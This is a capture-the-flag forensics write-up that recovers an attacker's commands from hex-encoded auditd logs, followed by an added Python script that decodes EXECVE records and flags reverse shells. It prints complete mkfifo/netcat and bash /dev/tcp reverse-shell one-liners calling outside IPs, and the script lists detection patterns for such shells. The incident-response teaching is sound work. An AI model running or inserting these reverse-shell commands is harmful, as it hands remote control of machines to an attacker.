Statement: In June 2023, an operator of vital importance falls victim to an attack that compromises its entire information system. You have received the Linux and Windows logs and must answer the investigators’ questions.
Note: The parts are numbered in the chronological order of the attack, but it is not necessary to solve them in order.
The attacker has executed a reverse shell on a machine. Find the command corresponding to the execution of this reverse shell.
Flag format: FCSC{COMMAND_LINE}
Example: FCSC{bash -i >& /dev/tcp/10.42.43.44/1234 0>&1}
I start by inspecting the Linux logs and notice that they are auditd logs:
...
node=webserver type=SYSCALL msg=audit(1686754794.649:12018): arch=c000003e syscall=59 success=yes exit=0 a0=7fe4a00d84e0 a1=7fe4a005d230 a2=7fff070c9698 a3=7fe4c3518ac0 items=2 ppid=5871 pid=11778 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=4294967295 comm="bash" exe="/usr/bin/bash" subj=unconfined key="program_execution" ARCH=x86_64 SYSCALL=execve AUID="unset" UID="ubuntu" GID="ubuntu" EUID="ubuntu" SUID="ubuntu" FSUID="ubuntu" EGID="ubuntu" SGID="ubuntu" FSGID="ubuntu"
node=webserver type=EXECVE msg=audit(1686754794.649:12018): argc=3 a0="/bin/bash" a1="-c" a2=726D202F746D702F663B6D6B6669666F202F746D702F663B636174202F746D702F667C2F62696E2F7368202D6920323E26317C6E632038302E3132352E392E3538203530303131203E2F746D702F66
node=webserver type=CWD msg=audit(1686754794.649:12018): cwd="/var/www/app/banque_paouf"
...
The auditd logs are composed of the following record types, which will be of interest to me in finding the payload:
- SYSCALL: the system call triggered (here execve)
- EXECVE: the arguments passed to the command
- PROCTITLE: the command line, often encoded in hexadecimal
Rather than using the ausearch binary to parse auditd logs, I prefer to play with bash.
# cat linux/*.log | grep -i "execve" | grep "bash" | grep "argc"
...
node=webserver type=EXECVE msg=audit(1686907217.007:18745): argc=3 a0="/bin/bash" a1="-c" a2=7375646F202E2F7465787420636C69656E74202D762038302E3132352E392E35373A353030313220523A736F636B73
node=bastion type=EXECVE msg=audit(1686916694.736:7725): argc=1 a0="-bash"
node=ip-172-16-45-110 type=EXECVE msg=audit(1686916709.895:1891226): argc=1 a0="-bash"
node=ip-172-16-45-110 type=EXECVE msg=audit(1686916718.195:1891415): argc=3 a0="bash" a1="-c" a2=736370202D74202E
...
I see in my output that most of the a2 arguments correspond to a bash command encoded in hexadecimal (auditd hex-encodes any argument containing special characters such as spaces).
So I put together the following one-liner to decode all the encoded arguments and output them in plain text:
# cat linux/*.log | grep -i "execve" | grep "/bin/bash" | grep "argc" | awk '{print $7}' | sed $'s/a2=/0a/g' | xxd -r -p | uniq
...
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50011 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.57 50012 >/tmp/f
...
Flag: FCSC{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80.125.9.58 50011 >/tmp/f}
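The one-liner above works for this challenge, but it only keeps records whose a0 is exactly "/bin/bash" and assumes a2 is always hex-encoded. The following Python script is an added example (not part of the original write-up) that generalizes the same idea: it parses the key=value fields of each auditd EXECVE record, decodes hex-encoded arguments while keeping quoted ones literal (the same thing `ausearch -i` does), reassembles one command line per event, and applies a few defender-side heuristics to flag reverse-shell patterns. The sample records are constructed from the log excerpts quoted above; the regexes in REVERSE_SHELL_PATTERNS are assumptions chosen for illustration, not an exhaustive detection rule set.

```python
"""Decode auditd EXECVE records and flag reverse-shell command lines.

Added example, not the write-up's own code. It parses the key=value
fields of auditd EXECVE records, decodes hex-encoded arguments the way
`ausearch -i` would, joins them into one command line per event, and
applies a few (assumed, illustrative) heuristics for reverse shells.
"""
import re

# Constructed sample: EXECVE records taken from the write-up's excerpts.
SAMPLE_LOG = """\
node=webserver type=EXECVE msg=audit(1686754794.649:12018): argc=3 a0="/bin/bash" a1="-c" a2=726D202F746D702F663B6D6B6669666F202F746D702F663B636174202F746D702F667C2F62696E2F7368202D6920323E26317C6E632038302E3132352E392E3538203530303131203E2F746D702F66
node=webserver type=EXECVE msg=audit(1686907217.007:18745): argc=3 a0="/bin/bash" a1="-c" a2=7375646F202E2F7465787420636C69656E74202D762038302E3132352E392E35373A353030313220523A736F636B73
node=bastion type=EXECVE msg=audit(1686916694.736:7725): argc=1 a0="-bash"
node=ip-172-16-45-110 type=EXECVE msg=audit(1686916718.195:1891415): argc=3 a0="bash" a1="-c" a2=736370202D74202E
"""

# key=value pairs; values are either a double-quoted string or a bare token.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
ARG_RE = re.compile(r'^a(\d+)$')          # a0, a1, a2, ... (not argc)
HEX_RE = re.compile(r'^[0-9A-Fa-f]+$')
EVENT_RE = re.compile(r'audit\(([\d.]+):(\d+)\)')

# Assumed indicators of a reverse shell in a decoded command line.
REVERSE_SHELL_PATTERNS = [
    re.compile(r'mkfifo\s+\S+.*\bnc\b'),                 # fifo + netcat relay
    re.compile(r'/dev/tcp/'),                            # bash /dev/tcp trick
    re.compile(r'\bnc\b.*\s-e\s+/bin/(ba)?sh'),          # nc -e /bin/sh
    re.compile(r'socket\.socket.*(dup2|pty\.spawn)'),    # python one-liners
]


def decode_arg(raw):
    """Return the plain-text value of one aN field.

    auditd writes arguments that contain only safe characters inside
    double quotes, and hex-encodes any argument with special characters
    (spaces, pipes, ...). Quoted values are returned literally, bare
    even-length hex strings are decoded.
    """
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if HEX_RE.match(raw) and len(raw) % 2 == 0:
        return bytes.fromhex(raw).decode('utf-8', errors='replace')
    return raw


def parse_execve(line):
    """Parse one EXECVE record into (node, event_id, cmdline), or None."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get('type') != 'EXECVE':
        return None
    m = EVENT_RE.search(fields.get('msg', ''))
    event_id = m.group(2) if m else None
    args = []
    for key, value in fields.items():
        am = ARG_RE.match(key)
        if am:
            args.append((int(am.group(1)), decode_arg(value)))
    args.sort()                                   # keep argv order
    cmdline = ' '.join(text for _, text in args)
    return fields.get('node'), event_id, cmdline


def is_reverse_shell(cmdline):
    """True if any of the assumed reverse-shell patterns matches."""
    return any(p.search(cmdline) for p in REVERSE_SHELL_PATTERNS)


def scan(log_text):
    """Return one dict per EXECVE record with the decoded command line."""
    results = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        node, event_id, cmdline = parsed
        results.append({'node': node, 'event_id': event_id,
                        'cmdline': cmdline,
                        'reverse_shell': is_reverse_shell(cmdline)})
    return results


if __name__ == '__main__':
    for r in scan(SAMPLE_LOG):
        tag = 'REVERSE SHELL' if r['reverse_shell'] else 'ok'
        print(f"[{tag}] {r['node']} event {r['event_id']}: {r['cmdline']}")
```

Run against the real logs with `scan(open(path).read())`; the event id lets you join each decoded command back to its SYSCALL and CWD records (same `audit(timestamp:serial)` value) to recover pid, uid and working directory, which is what the investigators' later questions usually need.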